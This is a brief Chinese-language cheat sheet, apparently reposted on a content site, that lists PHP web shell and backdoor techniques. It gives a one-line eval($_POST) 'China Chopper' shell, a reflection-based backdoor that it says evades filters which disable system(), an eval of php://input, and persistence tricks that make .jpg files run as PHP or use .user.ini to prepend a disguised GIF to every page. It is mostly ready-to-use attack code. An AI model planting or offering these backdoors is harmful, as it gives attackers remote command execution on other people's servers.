phpspy 菜刀一句話<?php@eval($_POST['cmd']);?>
反射后門
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>
調用如x.php?m=system&c=whoami
后門也可繞過某些檢測禁用system函數的防護系統

php://input是用來接收post數據(這里有php://input的介紹)
<?php
@eval(file_get_contents('php://input'))
?>
Post提交 system('whoami');

可以設置任意后綴也可以設置UTF7編碼格式shell
AddType application/x-httpd-php .jpg
然后再傳一個JPG結尾的shell,訪問即可執行了
動態修改php.ini配置文件
User.ini
auto_prepend_file:指定在每個PHP頁面執行前所要執行的代碼
auto_prepend_file=demo.gif (每個頁面都會加載demo.gif)


使用php://input (不需要上傳額外的文件)(需要自行打開allow_url_include=on 默認為off)
缺點:不支持.user.ini修改allow_url_include (在PHP5時是PHP_INI_SYSTEM。 從PHP5.2.0起可用。)

http://php.net/manual/zh/ini.list.php
http://php.net/manual/zh/configuration.changes.modes.php
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。